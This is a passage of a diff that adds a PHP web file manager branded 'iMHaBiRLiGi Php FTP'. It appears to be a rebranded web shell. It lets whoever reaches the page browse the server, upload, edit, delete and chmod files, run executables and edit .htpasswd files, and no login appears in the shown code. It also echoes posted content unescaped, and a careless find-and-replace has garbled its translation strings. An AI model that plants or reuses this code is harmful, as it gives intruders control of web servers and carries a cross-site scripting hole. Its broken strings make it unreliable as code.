+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="Görevler">' . word('Görevler') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="Görevler">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'Sil';
+			$actions[] = 'Degistir';
+			$actions[] = 'Tasi';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'Kopyala';
+			$actions[] = 'indir';
+			if ($file['is_writable']) $actions[] = 'Düzenle';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'Sil';
+		$actions[] = 'Tasi';
+	}
+	$actions[] = 'Kopyala';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function Düzenle ($file) {
+	global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="Düzenle" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Größe',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'Görevler' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausführen',
+
+'create_symlink' => 'Symlink erstellen',
+'Sil' => 'löschen',
+'Degistir' => 'umbenennen',
+'Tasi' => 'verschieben',
+'Kopyala' => 'kopieren',
+'Düzenle' => 'Düzenleieren',
+'indir' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zurücksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'Geri' => 'zurück',
+'Yol' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzufügen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
+'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
+'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
+'Degistir_file' => 'Benenne Datei um:',
+'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'Tasi_files' => 'Verschieben folgende Dateien:',
+'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'Kopyala_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte für "[%1]":',
+'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Répertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propriétaire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'Görevler' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Exécuter',
+
+'create_symlink' => 'Créer lien symbolique',
+'Sil' => 'Effacer',
+'Degistir' => 'Renommer',
+'Tasi' => 'Déplacer',
+'Kopyala' => 'Copier',
+'Düzenle' => 'Ouvrir',
+'indir' => 'Télécharger sur PC',
+'upload' => 'Télécharger sur serveur',
+'create' => 'Créer',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Exécuter',
+'reset' => 'Réinitialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'Geri' => 'Retour',
+'Yol' => 'Yol',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
+'already_exists' => '"[%1]" existe déjà.',
+'created' => '"[%1]" a été créé.',
+'not_created' => '"[%1]" n a pas pu être créé.',
+'really_Sil' => 'Effacer le fichier?',
+'Sild' => "Ces fichiers ont été détuits:\n[%1]",
+'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
+'Degistir_file' => 'Renomme fichier:',
+'Degistird' => '"[%1]" a été renommé en "[%2]".',
+'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
+'Tasi_files' => 'Déplacer ces fichiers:',
+'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
+'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
+'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
+'saved' => '"[%1]" a été sauvegardé.',
+'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
+'not_readable' => '"[%1]" ne peut pas être ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'Görevler' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'Sil' => 'cancella',
+'Degistir' => 'rinomina',
+'Tasi' => 'sposta',
+'Kopyala' => 'copia',
+'Düzenle' => 'modifica',
+'indir' => 'indir',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'Geri' => 'indietro',
+'Yol' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" è stato caricato.',
+'not_uploaded' => '"[%1]" non è stato caricato.',
+'already_exists' => '"[%1]" esiste già.',
+'created' => '"[%1]" è stato creato.',
+'not_created' => '"[%1]" non è stato creato.',
+'really_Sil' => 'Cancello questi file ?',
+'Sild' => "Questi file sono stati cancellati:\n[%1]",
+'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
+'Degistir_file' => 'File rinominato:',
+'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
+'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
+'Tasi_files' => 'Sposto questi file:',
+'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" non può essere modificato.',
+'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" è stato salvato.',
+'not_saved' => '"[%1]" non è stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non può essere letto.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'Säkerhetsnivå',
+'owner' => 'Ägare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'Görevler' => 'Funktioner',
+ 
+'read' => 'Läs',
+'write' => 'Skriv',
+'execute' => 'Utför',
+ 
+'create_symlink' => 'Skapa symlink',
+'Sil' => 'Radera',
+'Degistir' => 'Byt namn',
+'Tasi' => 'Flytta',
+'Kopyala' => 'Kopiera',
+'Düzenle' => 'Ändra',
+'indir' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => 'Ändra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'Töm',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'Geri' => 'Tillbaks',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Användare',
+'password' => 'Lösenord',
+'add' => 'Lägg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_Sil' => 'Radera dessa filer?',
+'Sild' => "De här filerna har raderats:\n[%1]",
+'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
+'Degistir_file' => 'Byt namn på fil:',
+'Degistird' => '"[%1]" har bytt namn till "[%2]".',
+'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
+'Tasi_files' => 'Flytta dessa filer:',
+'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" kan inte ändras.',
+'executed' => "\"[%1]\" har utförts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'Rättigheter för "[%1]":',
+'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte läsas.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Düzergah',
+'file' => 'Dosya',
+'filename' => 'DosyaAdi',
+
+'size' => 'Boyut',
+'permission' => 'izin',
+'owner' => 'Sahip',
+'group' => 'Grup',
+'other' => 'Diğerleri',
+'Görevler' => 'Görevler',
+
+'read' => 'Oku',
+'write' => 'Yaz',
+'execute' => 'Uygula',
+
+'create_symlink' => 'create symlink',
+'Sil' => 'Sil',
+'Degistir' => 'Degistir',
+'Tasi' => 'Tasi',
+'Kopyala' => 'Kopyala',
+'Düzenle' => 'Düzenle',
+'indir' => 'indir',
+'upload' => 'Yükle',
+'create' => 'Olustur',
+'change' => 'Degisiklik',
+'save' => 'Kaydet',
+'set' => 'Koyulan',
+'reset' => 'Yenile',
+'relative' => 'Hedefe Yolla',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'Geri' => 'Geri',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'Hiçbir çıktı',
+
+'user' => 'Kullanıcı',
